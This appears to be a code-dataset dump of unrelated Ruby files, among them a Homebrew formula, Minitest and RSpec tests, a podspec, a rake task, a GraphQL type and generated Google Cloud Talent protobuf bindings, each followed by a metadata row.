sha256 "dab03dd30ad5a58e578c5581241a6e87e184a18eb2c3b2e0fffa8a9cf105c97b"
bottle do
cellar :any_skip_relocation
sha256 "185f2f56eb03da60277520734452204ec2e0059cbc1f0af5d0fec1e7fa837658" => :high_sierra
sha256 "01a0709f74923e7b86d680f03d3ec056d3175cb7e54be176a26d5bfae890fd21" => :sierra
sha256 "7dade70b172cb91635afffe8bb1eadb251f9dbd3368ab9e4a37f98a7c0a14b01" => :el_capitan
sha256 "1799bdbb42974d10e2ff3a4e382351b1f03f0a3be31c15ff718d8935d1226101" => :yosemite
end
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--mandir=#{man}"
system "make", "install"
end
test do
system "#{bin}/pwgen", "--secure", "20", "10"
end
end
| 37.038462 | 93 | 0.719626 |
d584806ac48acb27e9be9c06dddfbe90cc1341fe | 3,929 | # frozen_string_literal: true
require 'test_helper'
class LmcCloudTest < Minitest::Test
def setup
@lmc = LMC::Cloud.new 'example.com', 'user', 'papa', nil, false
end
def test_that_it_can_get_account_objects
cloud = LMC::Cloud.instance
accounts = cloud.get_accounts_objects
refute_empty accounts
assert_instance_of LMC::Account, accounts.first
end
def test_that_account_failures_are_raised
mock_response = Fixtures.test_response({ 'message' => 'failed' }, 500)
@lmc.stub :get, mock_response do
ex = assert_raises RuntimeError do
@lmc.get_accounts_objects
end
assert_equal 'Unable to fetch accounts: failed', ex.to_s
end
end
def test_unhandled_login_failures_are_raised
lmc = LMC::Cloud.allocate
fake_post = lambda { |_url, _body|
bodystring = '{
"timestamp": "2021-07-16T12:06:31.451Z",
"service": "auth",
"version": "9.24.4000",
"status": 400,
"path": "/userlogin",
"code": 199,
"details": {},
"message": "Authentication error",
"type": "DetailedProcessException"
}'
e = Fixtures.restclient_exception bodystring, 400
raise e
}
lmc.stub :post, fake_post do
assert_raises RuntimeError do
lmc.send :initialize, 'localhost', 'admin', 'test1234'
end
end
end
def test_backstage_infos
cloud = LMC::Cloud.instance
infos = cloud.get_backstage_serviceinfos
refute_empty infos
end
def test_password_hidden
cloud = LMC::Cloud.instance
infos = cloud.inspect
refute_match(/password/, infos)
end
def test_put
fake_execute = lambda { |_r|
return OpenStruct.new(:bytesize => 0)
}
c = LMC::Cloud.instance
::RestClient::Request.stub :execute, fake_execute do
response = c.put ['service', 'test'], 'this' => 'body'
assert_kind_of(LMC::LMCResponse, response)
end
end
def test_delete
fake_execute = Minitest::Mock.new
fake_execute.expect :call,
Fixtures.test_restclient_response(''), [Hash]
fake_execute.expect :call,
Fixtures.test_restclient_response('') do |args|
assert_equal args[:method], :delete
assert_equal args[:url], 'https://example.com/foo'
assert_equal args[:headers], { :content_type => 'application/json',
:params => { :ids => ['12', '23'] } }
end
@lmc.stub :execute_request, fake_execute do
@lmc.delete ['foo']
@lmc.delete ['foo'], { ids: ['12', '23'] }
end
assert fake_execute.verify
end
def test_protocol_selection
cloud = LMC::Cloud.instance
pre_state = LMC::Cloud.use_tls
LMC::Cloud.use_tls = false
http_url = cloud.build_url(['test', 'url'])
assert_equal "http://#{LMC::Tests::CredentialsHelper.credentials.ok.host}/test/url", http_url
cloud = LMC::Cloud.instance
LMC::Cloud.use_tls = true
http_url = cloud.build_url(['test', 'url'])
assert_equal "https://#{LMC::Tests::CredentialsHelper.credentials.ok.host}/test/url", http_url
LMC::Cloud.use_tls = pre_state
end
def test_exception_logging
fake_execute = lambda { |_r|
response = RestClient::Response.create '{"message": "FAIL"}', Net::HTTPResponse.new('', '200', ''), RestClient::Request.new({ :method => :post, url: 'http://localhost/' })
ex = RestClient::ExceptionWithResponse.new response, 500
ex.message = 'buh'
raise ex
}
fake_puts = Minitest::Mock.new
fake_puts.expect :call, nil, ['EXCEPTION: buh']
fake_puts.expect :call, nil, ['EX.response: {"message": "FAIL"}']
fake_puts.expect :call, nil, ['FAIL']
LMC::Cloud.stub :debug, true do
@lmc.stub :puts, fake_puts, String do
RestClient::Request.stub :execute, fake_execute do
assert_raises LMC::ResponseException do
@lmc.get []
end
end
end
end
end
end
| 30.223077 | 177 | 0.640112 |
1c9f5a89cac594d0ce243754a063693a4084aa18 | 1,647 | require 'spec_helper'
module RailsBestPractices
module Reviews
describe MoveCodeIntoHelperReview do
let(:runner) { Core::Runner.new(reviews: MoveCodeIntoHelperReview.new('array_count' => 2)) }
it "should move code into helper" do
content = <<-EOF
<%= select_tag :state, options_for_select( [[t(:draft), "draft"],
[t(:published), "published"]],
params[:default_state] ) %>
EOF
runner.review('app/views/posts/show.html.erb', content)
expect(runner.errors.size).to eq(1)
expect(runner.errors[0].to_s).to eq("app/views/posts/show.html.erb:1 - move code into helper (array_count >= 2)")
end
it "should not move code into helper with simple arguments" do
content = <<-EOF
<%= select_tag :state, options_for_select( Post.STATES ) %>
EOF
runner.review('app/views/posts/show.html.erb', content)
expect(runner.errors.size).to eq(0)
end
it "should not check ignored files" do
runner = Core::Runner.new(reviews: MoveCodeIntoControllerReview.new('array_count' => 2, 'ignored_files' => /app\/views\/post/))
content = <<-EOF
<%= select_tag :state, options_for_select( [[t(:draft), "draft"],
[t(:published), "published"]],
params[:default_state] ) %>
EOF
runner.review('app/views/posts/show.html.erb', content)
expect(runner.errors.size).to eq(0)
end
end
end
end
| 41.175 | 135 | 0.555556 |
bbce767d30feb02f3008821323798bd858b7d2f1 | 703 | Pod::Spec.new do |s|
s.name = 'ObjectiveLibModbus'
s.version = '0.0.1'
s.license = 'GNU'
s.summary = 'Obj-C wrapper for libmodbus.'
s.homepage = 'https://github.com/iUtvikler/ObjectiveLibModbus'
s.author = { 'Lars-Jørgen Kristiansen' => '[email protected]' }
s.source = { :git => 'https://github.com/iUtvikler/ObjectiveLibModbus.git', :tag => '0.0.1' }
s.description = 'ObjectiveLibModbus is an Objective-C wrapper class for the libmodbus library.' \
'I included tweaked and compiled libmodbus sourcefiles, that work with OS X and iOS in this project'
s.source_files = 'ObjectiveLibModbus/*.{h,m}', 'Vendor/libmodbus/*.{c,h}'
s.requires_arc = true
end
| 50.214286 | 118 | 0.671408 |
bb15f4f06d43741285a6afb42772accb5a7f93bf | 222 | namespace :create do
task user: :environment do
User.create(
email: ENV['email'],
password: ENV['password'],
first_name: 'Mary',
last_name: 'Poppins',
role: 'registered'
)
end
end
| 18.5 | 32 | 0.585586 |
03ca9b7a5746a6261d3d064d6ee19ceec97660de | 650 | require_relative '../spec_helper'
def expect_page_to_be_at_top
page.document.synchronize do |variable|
scroll_top = page.evaluate_script('$("html, body").scrollTop()')
raise Capybara::ElementNotFound, "Page is not at the top. Scroll top = #{scroll_top}" unless scroll_top == 0
end
end
feature 'JQuery Back to Top', js: true do
scenario 'using the component' do
visit '/css_components_forms.html'
expect(page).not_to have_css('.back-to-top')
page.evaluate_script('$("html, body").scrollTop(500)')
page.find('.back-to-top').click
expect_page_to_be_at_top
expect(page).not_to have_css('.back-to-top')
end
end
| 29.545455 | 112 | 0.712308 |
b9401b1579c5c5e6615a068b47028b5847fd7f1d | 173 | module Serverspec::Type
class Ipfilter < Base
def has_rule?(rule)
@runner.check_ipfilter_has_rule(rule)
end
def to_s
'ipfilter'
end
end
end
| 14.416667 | 43 | 0.647399 |
3823bd94083229f5d1c60bbb9e06da374adc599f | 919 | # frozen_string_literal: true
module Types
module Tree
# rubocop: disable Graphql/AuthorizeTypes
# This is presented through `Repository` that has its own authorization
class BlobType < BaseObject
implements Types::Tree::EntryType
present_using BlobPresenter
graphql_name 'Blob'
field :web_url, GraphQL::STRING_TYPE, null: true,
description: 'Web URL of the blob.'
field :web_path, GraphQL::STRING_TYPE, null: true,
description: 'Web path of the blob.'
field :lfs_oid, GraphQL::STRING_TYPE, null: true,
description: 'LFS ID of the blob.'
field :mode, GraphQL::STRING_TYPE, null: true,
description: 'Blob mode in numeric format.'
def lfs_oid
Gitlab::Graphql::Loaders::BatchLfsOidLoader.new(object.repository, object.id).find
end
end
# rubocop: enable Graphql/AuthorizeTypes
end
end
| 31.689655 | 90 | 0.67247 |
ac146441457816528d929a0bd713500c3b3b38c4 | 206 | <% module_namespacing do -%>
class <%= class_name %>Preview < ActionMailer::Preview
<% actions.each do |action| -%>
def <%= action %>
<%= class_name %>.<%= action %>
end
<% end -%>
end
<% end -%>
| 17.166667 | 54 | 0.567961 |
d58ff2f7ef02ef114355bed4e0790a5f24cf5ae0 | 11,391 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/talent/v4beta1/filters.proto
require 'google/protobuf'
require 'google/api/field_behavior_pb'
require 'google/cloud/talent/v4beta1/common_pb'
require 'google/protobuf/duration_pb'
require 'google/protobuf/field_mask_pb'
require 'google/protobuf/timestamp_pb'
require 'google/protobuf/wrappers_pb'
require 'google/type/date_pb'
require 'google/type/latlng_pb'
require 'google/type/timeofday_pb'
require 'google/api/annotations_pb'
# Registers the message and enum descriptors from filters.proto with the
# generated descriptor pool (standard protoc-generated boilerplate).
Google::Protobuf::DescriptorPool.generated_pool.build do
  add_file("google/cloud/talent/v4beta1/filters.proto", :syntax => :proto3) do
    add_message "google.cloud.talent.v4beta1.JobQuery" do
      optional :query, :string, 1
      optional :query_language_code, :string, 14
      repeated :companies, :string, 2
      repeated :location_filters, :message, 3, "google.cloud.talent.v4beta1.LocationFilter"
      repeated :job_categories, :enum, 4, "google.cloud.talent.v4beta1.JobCategory"
      optional :commute_filter, :message, 5, "google.cloud.talent.v4beta1.CommuteFilter"
      repeated :company_display_names, :string, 6
      optional :compensation_filter, :message, 7, "google.cloud.talent.v4beta1.CompensationFilter"
      optional :custom_attribute_filter, :string, 8
      optional :disable_spell_check, :bool, 9
      repeated :employment_types, :enum, 10, "google.cloud.talent.v4beta1.EmploymentType"
      repeated :language_codes, :string, 11
      optional :publish_time_range, :message, 12, "google.cloud.talent.v4beta1.TimestampRange"
      repeated :excluded_jobs, :string, 13
    end
    add_message "google.cloud.talent.v4beta1.ProfileQuery" do
      optional :query, :string, 1
      repeated :location_filters, :message, 2, "google.cloud.talent.v4beta1.LocationFilter"
      repeated :job_title_filters, :message, 3, "google.cloud.talent.v4beta1.JobTitleFilter"
      repeated :employer_filters, :message, 4, "google.cloud.talent.v4beta1.EmployerFilter"
      repeated :education_filters, :message, 5, "google.cloud.talent.v4beta1.EducationFilter"
      repeated :skill_filters, :message, 6, "google.cloud.talent.v4beta1.SkillFilter"
      repeated :work_experience_filter, :message, 7, "google.cloud.talent.v4beta1.WorkExperienceFilter"
      repeated :time_filters, :message, 8, "google.cloud.talent.v4beta1.TimeFilter"
      optional :hirable_filter, :message, 9, "google.protobuf.BoolValue"
      repeated :application_date_filters, :message, 10, "google.cloud.talent.v4beta1.ApplicationDateFilter"
      repeated :application_outcome_notes_filters, :message, 11, "google.cloud.talent.v4beta1.ApplicationOutcomeNotesFilter"
      repeated :application_job_filters, :message, 13, "google.cloud.talent.v4beta1.ApplicationJobFilter"
      optional :custom_attribute_filter, :string, 15
      optional :candidate_availability_filter, :message, 16, "google.cloud.talent.v4beta1.CandidateAvailabilityFilter"
      repeated :availability_filters, :message, 18, "google.cloud.talent.v4beta1.AvailabilityFilter"
      repeated :person_name_filters, :message, 17, "google.cloud.talent.v4beta1.PersonNameFilter"
    end
    add_message "google.cloud.talent.v4beta1.LocationFilter" do
      optional :address, :string, 1
      optional :region_code, :string, 2
      optional :lat_lng, :message, 3, "google.type.LatLng"
      optional :distance_in_miles, :double, 4
      optional :telecommute_preference, :enum, 5, "google.cloud.talent.v4beta1.LocationFilter.TelecommutePreference"
      optional :negated, :bool, 6
    end
    add_enum "google.cloud.talent.v4beta1.LocationFilter.TelecommutePreference" do
      value :TELECOMMUTE_PREFERENCE_UNSPECIFIED, 0
      value :TELECOMMUTE_EXCLUDED, 1
      value :TELECOMMUTE_ALLOWED, 2
    end
    add_message "google.cloud.talent.v4beta1.CompensationFilter" do
      optional :type, :enum, 1, "google.cloud.talent.v4beta1.CompensationFilter.FilterType"
      repeated :units, :enum, 2, "google.cloud.talent.v4beta1.CompensationInfo.CompensationUnit"
      optional :range, :message, 3, "google.cloud.talent.v4beta1.CompensationInfo.CompensationRange"
      optional :include_jobs_with_unspecified_compensation_range, :bool, 4
    end
    add_enum "google.cloud.talent.v4beta1.CompensationFilter.FilterType" do
      value :FILTER_TYPE_UNSPECIFIED, 0
      value :UNIT_ONLY, 1
      value :UNIT_AND_AMOUNT, 2
      value :ANNUALIZED_BASE_AMOUNT, 3
      value :ANNUALIZED_TOTAL_AMOUNT, 4
    end
    add_message "google.cloud.talent.v4beta1.CommuteFilter" do
      optional :commute_method, :enum, 1, "google.cloud.talent.v4beta1.CommuteMethod"
      optional :start_coordinates, :message, 2, "google.type.LatLng"
      optional :travel_duration, :message, 3, "google.protobuf.Duration"
      optional :allow_imprecise_addresses, :bool, 4
      oneof :traffic_option do
        optional :road_traffic, :enum, 5, "google.cloud.talent.v4beta1.CommuteFilter.RoadTraffic"
        optional :departure_time, :message, 6, "google.type.TimeOfDay"
      end
    end
    add_enum "google.cloud.talent.v4beta1.CommuteFilter.RoadTraffic" do
      value :ROAD_TRAFFIC_UNSPECIFIED, 0
      value :TRAFFIC_FREE, 1
      value :BUSY_HOUR, 2
    end
    add_message "google.cloud.talent.v4beta1.JobTitleFilter" do
      optional :job_title, :string, 1
      optional :negated, :bool, 2
    end
    add_message "google.cloud.talent.v4beta1.SkillFilter" do
      optional :skill, :string, 1
      optional :negated, :bool, 2
    end
    add_message "google.cloud.talent.v4beta1.EmployerFilter" do
      optional :employer, :string, 1
      optional :mode, :enum, 2, "google.cloud.talent.v4beta1.EmployerFilter.EmployerFilterMode"
      optional :negated, :bool, 3
    end
    add_enum "google.cloud.talent.v4beta1.EmployerFilter.EmployerFilterMode" do
      value :EMPLOYER_FILTER_MODE_UNSPECIFIED, 0
      value :ALL_EMPLOYMENT_RECORDS, 1
      value :CURRENT_EMPLOYMENT_RECORDS_ONLY, 2
      value :PAST_EMPLOYMENT_RECORDS_ONLY, 3
    end
    add_message "google.cloud.talent.v4beta1.EducationFilter" do
      optional :school, :string, 1
      optional :field_of_study, :string, 2
      optional :degree_type, :enum, 3, "google.cloud.talent.v4beta1.DegreeType"
      optional :negated, :bool, 6
    end
    add_message "google.cloud.talent.v4beta1.WorkExperienceFilter" do
      optional :min_experience, :message, 1, "google.protobuf.Duration"
      optional :max_experience, :message, 2, "google.protobuf.Duration"
    end
    add_message "google.cloud.talent.v4beta1.ApplicationDateFilter" do
      optional :start_date, :message, 1, "google.type.Date"
      optional :end_date, :message, 2, "google.type.Date"
    end
    add_message "google.cloud.talent.v4beta1.ApplicationOutcomeNotesFilter" do
      optional :outcome_notes, :string, 1
      optional :negated, :bool, 2
    end
    add_message "google.cloud.talent.v4beta1.ApplicationJobFilter" do
      optional :job_requisition_id, :string, 2
      optional :job_title, :string, 3
      optional :negated, :bool, 4
    end
    add_message "google.cloud.talent.v4beta1.TimeFilter" do
      optional :start_time, :message, 1, "google.protobuf.Timestamp"
      optional :end_time, :message, 2, "google.protobuf.Timestamp"
      optional :time_field, :enum, 3, "google.cloud.talent.v4beta1.TimeFilter.TimeField"
    end
    add_enum "google.cloud.talent.v4beta1.TimeFilter.TimeField" do
      value :TIME_FIELD_UNSPECIFIED, 0
      value :CREATE_TIME, 1
      value :UPDATE_TIME, 2
    end
    add_message "google.cloud.talent.v4beta1.CandidateAvailabilityFilter" do
      optional :negated, :bool, 1
    end
    add_message "google.cloud.talent.v4beta1.AvailabilityFilter" do
      optional :signal_type, :enum, 1, "google.cloud.talent.v4beta1.AvailabilitySignalType"
      optional :range, :message, 2, "google.cloud.talent.v4beta1.TimestampRange"
      optional :required, :bool, 3
    end
    add_message "google.cloud.talent.v4beta1.PersonNameFilter" do
      optional :person_name, :string, 1
    end
  end
end
# Constant bindings for the descriptors registered above (appears to be
# protoc-generated output — do not hand-edit; regenerate from the .proto).
# Each lookup fetches a descriptor from the shared generated pool by its
# fully-qualified proto name; `.msgclass` materializes the Ruby message
# class and `.enummodule` the module holding the enum's value constants.
# NOTE(review): `lookup` returns nil for an unregistered name, which would
# turn into a NoMethodError at load time — the build block above must have
# run first, which it has within this file.
module Google
  module Cloud
    module Talent
      module V4beta1
        JobQuery = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.JobQuery").msgclass
        ProfileQuery = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.ProfileQuery").msgclass
        LocationFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.LocationFilter").msgclass
        # Nested enums are bound as constants scoped under their parent
        # message class (e.g. LocationFilter::TelecommutePreference).
        LocationFilter::TelecommutePreference = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.LocationFilter.TelecommutePreference").enummodule
        CompensationFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.CompensationFilter").msgclass
        CompensationFilter::FilterType = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.CompensationFilter.FilterType").enummodule
        CommuteFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.CommuteFilter").msgclass
        CommuteFilter::RoadTraffic = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.CommuteFilter.RoadTraffic").enummodule
        JobTitleFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.JobTitleFilter").msgclass
        SkillFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.SkillFilter").msgclass
        EmployerFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.EmployerFilter").msgclass
        EmployerFilter::EmployerFilterMode = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.EmployerFilter.EmployerFilterMode").enummodule
        EducationFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.EducationFilter").msgclass
        WorkExperienceFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.WorkExperienceFilter").msgclass
        ApplicationDateFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.ApplicationDateFilter").msgclass
        ApplicationOutcomeNotesFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.ApplicationOutcomeNotesFilter").msgclass
        ApplicationJobFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.ApplicationJobFilter").msgclass
        TimeFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.TimeFilter").msgclass
        TimeFilter::TimeField = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.TimeFilter.TimeField").enummodule
        CandidateAvailabilityFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.CandidateAvailabilityFilter").msgclass
        AvailabilityFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.AvailabilityFilter").msgclass
        PersonNameFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.PersonNameFilter").msgclass
      end
    end
  end
end
# NOTE(review): the lines below are dataset-extraction residue (a metadata
# table row and website boilerplate), not Ruby source. Commented out so the
# file parses; safe to delete entirely.
# | 59.952632 | 183 | 0.755421 |
# Subsets and Splits
# No community queries yet
# The top public SQL queries from the community will appear here once available.